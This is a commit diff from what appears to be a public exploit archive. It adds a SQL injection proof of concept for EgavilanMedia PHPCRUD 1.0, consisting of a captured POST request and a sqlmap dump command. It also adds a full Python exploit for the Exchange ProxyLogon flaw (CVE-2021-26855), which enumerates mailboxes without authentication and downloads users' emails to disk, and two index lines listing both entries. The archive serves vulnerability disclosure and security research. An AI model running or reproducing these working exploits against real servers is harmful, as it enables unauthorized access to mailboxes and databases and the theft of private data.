DB: 2021-05-19

2 changes to exploits/shellcodes EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection Microsoft Exchange 2019 - Unauthenticated Email Download
2021-05-19 05:01:55 +00:00 · 2021-05-19 05:01:55 +00:00 · c2ae9df113
commit c2ae9df113
parent 1b1c47b0a8
3 changed files with 252 additions and 0 deletions
--- a/exploits/php/webapps/49878.txt
+++ b/exploits/php/webapps/49878.txt
@ -0,0 +1,32 @@
+# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection
+# Date: 5/17/2021
+# Exploit Author: Dimitrios Mitakos
+# Vendor Homepage: https://egavilanmedia.com
+# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
+# Version: 1.0
+# Tested on: Debian GNU/Linux 10
+
+Vulnerable Parameter : firstname
+
+1. Burp Suite -> Intercept is on
+
+2. Go to the Website -> Add New Record
+
+3. Back to Burp Suite -> Copy to file (r.txt)
+
+POST /insert.php HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 67
+Origin: http:// <http://10.0.2.244/>x.x.x.x
+Connection: close
+Referer: http://x.x.x.x/index.php
+Upgrade-Insecure-Requests: 1
+
+firstname=x&lastname=y&address=z&skills=w&designation=a&insertData=
+
+4. sqlmap -r r.txt --dump
--- a/exploits/windows/webapps/49879.py
+++ b/exploits/windows/webapps/49879.py
@ -0,0 +1,218 @@
+# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download
+# Date: 03-11-2021
+# Exploit Author: Gonzalo Villegas a.k.a Cl34r
+# Vendor Homepage: https://www.microsoft.com/
+# Version: OWA Exchange 2013 - 2019
+# Tested on: OWA 2016
+# CVE : CVE-2021-26855
+# Details: checking users mailboxes and automated downloads of emails
+
+import requests
+import argparse
+import time
+
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+__proxies__ = {"http": "http://127.0.0.1:8080",
+               "https": "https://127.0.0.1:8080"}  # for debug on proxy
+
+
+# needs to specifies mailbox, will return folder Id if account exists
+payload_get_folder_id = """<?xml version="1.0" encoding="utf-8"?>
+            <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
+            xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
+            xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
+            xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+                <soap:Body>
+                    <m:GetFolder>
+                        <m:FolderShape>
+                            <t:BaseShape>AllProperties</t:BaseShape>
+                        </m:FolderShape>
+                        <m:FolderIds>
+                            <t:DistinguishedFolderId Id="inbox">
+                                <t:Mailbox>
+                                    <t:EmailAddress>{}</t:EmailAddress>
+                                </t:Mailbox>
+                            </t:DistinguishedFolderId>
+                        </m:FolderIds>
+                    </m:GetFolder>
+                </soap:Body>
+            </soap:Envelope>
+
+"""
+# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)
+payload_get_items_id_folder = """<?xml version="1.0" encoding="utf-8"?>
+            <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
+            xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
+            xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
+            xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+            <soap:Body>
+            <m:FindItem Traversal="Shallow">
+               <m:ItemShape>
+            <BaseShape>AllProperties</BaseShape></m:ItemShape>
+               <SortOrder/>
+             <m:ParentFolderIds>
+                    <t:FolderId Id="{}" ChangeKey="{}"/>
+                  </m:ParentFolderIds>
+               <QueryString/>
+            </m:FindItem>
+            </soap:Body>
+</soap:Envelope>
+"""
+
+# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox
+payload_get_mail = """<?xml version="1.0" encoding="utf-8"?>
+            <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
+            xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
+            xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
+            xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+                <soap:Body>
+            <GetItem   xmlns="http://schemas.microsoft.com/exchange/services/2006/messages" 
+            xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" Traversal="Shallow">
+            <ItemShape>
+            <t:BaseShape>Default</t:BaseShape>
+            </ItemShape>
+            <ItemIds>
+            <t:ItemId Id="{}" ChangeKey="{}"/>
+            </ItemIds>
+            </GetItem>
+                </soap:Body>
+            </soap:Envelope>
+"""
+
+
+def getFQDN(url):
+    print("[*] Getting FQDN from headers")
+    rs = requests.post(url + "/owa/auth.owa", verify=False, data="evildata")
+    if "X-FEServer" in rs.headers:
+        return rs.headers["X-FEServer"]
+    else:
+        print("[-] Can't get FQDN ")
+        exit(0)
+
+
+def extractEmail(url, uri, user, fqdn, content_folderid, path):
+    headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn),
+               "Content-Type": "text/xml",
+               "User-Agent": "Mozilla pwner"}
+    from xml.etree import ElementTree as ET
+    dom = ET.fromstring(content_folderid)
+    for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):
+        id_folder = p[0].attrib.get("Id")
+        change_key_folder = p[0].attrib.get("ChangeKey")
+        data = payload_get_items_id_folder.format(id_folder, change_key_folder)
+        random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"]
+        rs = requests.post(url + uri, data=data, headers=headers, verify=False)
+        if "ErrorAccessDenied" in rs.text:
+            print("[*] Denied ;(.. retrying")
+            t_uri = uri.split("/")[-1]
+            for ru in random_uris:
+                print("[*] Retrying with {}".format(uri.replace(t_uri, ru)))
+                rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)
+                if "NoError" in rs.text:
+                    print("[+] data found, dowloading email")
+                    break
+        print("[+]Getting mails...")
+        dom_messages = ET.fromstring(rs.text)
+        messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')
+        for m in messages:
+            id_message = m[0].attrib.get("Id")
+            change_key_message = m[0].attrib.get("ChangeKey")
+            data = payload_get_mail.format(id_message, change_key_message)
+            random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"]
+            rs = requests.post(url + uri, data=data, headers=headers, verify=False)
+            if "ErrorAccessDenied" in rs.text:
+                print("[*] Denied ;(.. retrying")
+                t_uri = uri.split("/")[-1]
+                for ru in random_uris:
+                    print("[*] Retrying with {}".format(uri.replace(t_uri, ru)))
+                    rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)
+                    if "NoError" in rs.text:
+                        print("[+] data found, downloading email")
+                        break
+
+            try:
+                f = open(path + "/" + user.replace("@", "_").replace(".", "_")+"_"+change_key_message.replace("/", "").replace("\\", "")+".xml", 'w+')
+                f.write(rs.text)
+                f.close()
+            except Exception as e:
+                print("[!] Can't write .xml file to path (email): ", e)
+
+
+def checkURI(url, fqdn):
+    headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn),
+               "Content-Type": "text/xml",
+               "User-Agent": "Mozilla hehe"}
+    arr_uri = ["//ecp/xxx.js", "/ecp/favicon.ico", "/ecp/auth.js"]
+    for uri in arr_uri:
+        rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format("thisisnotanvalidmail@pwn.local"),
+                           headers=headers)
+        #print(rs.content)
+        if rs.status_code == 200 and "MessageText" in rs.text:
+            print("[+] Valid URI:", uri)
+            calculated_domain = rs.headers["X-CalculatedBETarget"].split(".")
+            if calculated_domain[-2] in ("com", "gov", "gob", "edu", "org"):
+                calculated_domain = calculated_domain[-3] + "." + calculated_domain[-2] + "." + calculated_domain[-1]
+            else:
+                calculated_domain = calculated_domain[-2] + "." + calculated_domain[-1]
+            return uri, calculated_domain
+        #time.sleep(1)
+    print("[-] No valid URI found ;(")
+    exit(0)
+
+
+def checkEmailBoxes(url, uri, user, fqdn, path):
+    headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn),
+               "Content-Type": "text/xml",
+               "User-Agent": "Mozilla hehe"}
+    rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),
+                       headers=headers)
+    #time.sleep(1)
+    #print(rs.content)
+    if "ResponseCode" in rs.text and "ErrorAccessDenied" in rs.text:
+        print("[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable".format(user))
+    if "ResponseCode" in rs.text and "NoError" in rs.text:
+        print("[+] Valid Email Found!: {}".format(user))
+        extractEmail(url, uri, user, fqdn, rs.text, path)
+    if "ResponseCode" in rs.text and "ErrorNonExistentMailbox" in rs.text:
+        print("[-] Not Valid Email: {}".format(user))
+
+
+def main():
+    __URL__ = None
+    __FQDN__ = None
+    __mailbox_domain__ = None
+    __path__ = None
+    print("[***** OhhWAA *****]")
+    parser = argparse.ArgumentParser(usage="Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>")
+    parser.add_argument('-u', "--url", help="Url, provide schema and not final / (eg https://example.org)", required=True)
+    parser.add_argument('-l', "--list", help="Users mailbox list", required=True)
+    parser.add_argument("-p", "--path", help="Path to write emails in xml format", required=True)
+    parser.add_argument('-f', "--fqdn", help="FQDN", required=False, default=None)
+    parser.add_argument("-d", "--domain", help="Domain to check mailboxes (eg if .local dont work)", required=False, default=None)
+    args = parser.parse_args()
+    __URL__ = args.url
+    __FQDN__ = args.fqdn
+    __mailbox_domain__ = args.domain
+    __list_users__ = args.list
+    __valid_users__ = []
+    __path__ = args.path
+    if not __FQDN__:
+        __FQDN__ = getFQDN(__URL__)
+        print("[+] Got FQDN:", __FQDN__)
+
+    valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)
+
+    if not __mailbox_domain__:
+        __mailbox_domain__ = calculated_domain
+
+    list_users = open(__list_users__, "r")
+    for user in list_users:
+        checkEmailBoxes(__URL__, valid_uri, user.strip()+"@"+__mailbox_domain__, __FQDN__, __path__)
+
+    print("[!!!] FINISHED OhhWAA")
+
+
+if __name__ == '__main__':
+    main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44043,3 +44043,5 @@ id,file,description,date,author,type,platform,port
 49875,exploits/php/webapps/49875.txt,"Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)",2021-05-17,"Abdulkadir AYDOGAN",webapps,php,
 49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)",2021-05-17,"Fellipe Oliveira",webapps,php,
 49877,exploits/php/webapps/49877.txt,"Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload",2021-05-17,bwnz,webapps,php,
+49878,exploits/php/webapps/49878.txt,"EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection",2021-05-18,"Dimitrios Mitakos",webapps,php,
+49879,exploits/windows/webapps/49879.py,"Microsoft Exchange 2019 - Unauthenticated Email Download",2021-05-18,"Gonzalo Villegas",webapps,windows,